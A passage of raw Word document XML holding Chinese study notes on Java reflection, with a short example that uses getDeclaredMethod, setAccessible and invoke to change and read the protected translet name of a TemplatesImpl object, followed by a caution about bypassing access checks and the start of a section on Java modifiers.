    <w:p w14:paraId="3861BFD9" w14:textId="77777777" w:rsidR="00792E2A" w:rsidRDefault="00792E2A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="006B7E9E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    setTransletNameMethod.invoke(obj, "");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1909BF5A" w14:textId="77777777" w:rsidR="00792E2A" w:rsidRDefault="00792E2A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F78024A" w14:textId="7E293452" w:rsidR="00ED7C52" w:rsidRDefault="00672AAB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实际案例：使用</w:t>
      </w:r>
      <w:r w:rsidR="006D674E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反射修改</w:t>
      </w:r>
      <w:r w:rsidR="006D674E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>protected</w:t>
      </w:r>
      <w:r w:rsidR="006D674E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644001A5" w14:textId="77777777" w:rsidR="00672AAB" w:rsidRDefault="00672AAB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAE3B9C" w14:textId="77777777" w:rsidR="00877C8E" w:rsidRDefault="0060285D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>如下，我使用反射修改一些东西。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A96E6E" w14:textId="7631AC81" w:rsidR="00672AAB" w:rsidRDefault="00877C8E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00877C8E">
        <w:t>TemplatesImpl.class.getDeclaredMethod("setTransletName", String.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507F2B03" w14:textId="7DD61A73" w:rsidR="00877C8E" w:rsidRPr="00877C8E" w:rsidRDefault="00877C8E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后面的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>.class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个参数指</w:t>
      </w:r>
      <w:r w:rsidRPr="00877C8E">
        <w:t>"setTransletName"</w:t>
      </w:r>
      <w:r w:rsidR="00891B8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个名字的函数的参数，这个函数本来就接受</w:t>
      </w:r>
      <w:r w:rsidR="00891B8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidR="00891B8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型参数，所以我们写</w:t>
      </w:r>
      <w:r w:rsidR="00891B8D" w:rsidRPr="00877C8E">
        <w:t>getDeclaredMethod("setTransletName", String.class)</w:t>
      </w:r>
      <w:r w:rsidR="00891B8D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标明他是哪个重载函数。</w:t>
      </w:r>
      <w:r w:rsidR="00FB5566">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果照猫画虎第二个参数写</w:t>
      </w:r>
      <w:r w:rsidR="00FB5566">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00FB5566">
        <w:t>tring.class</w:t>
      </w:r>
      <w:r w:rsidR="00FB5566">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的话，只会抛出异常</w:t>
      </w:r>
      <w:r w:rsidR="00B43D61" w:rsidRPr="00B43D61">
        <w:t>NoSuchMethodException</w:t>
      </w:r>
      <w:r w:rsidR="00AC4161">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC34509" w14:textId="77777777" w:rsidR="00794E23" w:rsidRDefault="00794E23" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="292A2F"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">TemplatesImpl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">obj = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">new </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D0A8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>TemplatesImpl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Method </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">setNameMethod = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>TemplatesImpl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>getDeclaredMethod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"setTransletName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>setNameMethod.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>setAccessible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>setNameMethod.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>invoke</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">(obj, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"im new name"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Method </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">getNameMethod = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>TemplatesImpl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>getDeclaredMethod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FC6A5D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"getTransletName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>getNameMethod.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>setAccessible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A167E6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(getNameMethod.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>invoke</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(obj));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4A0229" w14:textId="77777777" w:rsidR="00672AAB" w:rsidRPr="00794E23" w:rsidRDefault="00672AAB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="241933F3" w14:textId="77777777" w:rsidR="0050733C" w:rsidRDefault="0050733C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47EFD891" w14:textId="77777777" w:rsidR="0050733C" w:rsidRDefault="0050733C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EB032C7" w14:textId="77777777" w:rsidR="0050733C" w:rsidRDefault="0050733C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A00D17A" w14:textId="77777777" w:rsidR="00ED7C52" w:rsidRDefault="00ED7C52" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A9B6FD5" w14:textId="77777777" w:rsidR="00ED7C52" w:rsidRDefault="00ED7C52" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3357E7C1" w14:textId="77777777" w:rsidR="00ED7C52" w:rsidRDefault="00ED7C52" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4874D503" w14:textId="3346C650" w:rsidR="00AE261E" w:rsidRDefault="00792E2A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请注意，使用反射机制可能会绕过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的访问权限，这可能导致不可预料的行为和安全问题。在使用反射时，请谨慎考虑并确保了解相关的风险和注意事项。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FC0FA4" w14:textId="77777777" w:rsidR="00AE261E" w:rsidRDefault="00AE261E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3925B516" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>非访问控制修饰符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:static final</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A0E22F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15121312" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717265E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>abstract</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBBB930" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BC4CDD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
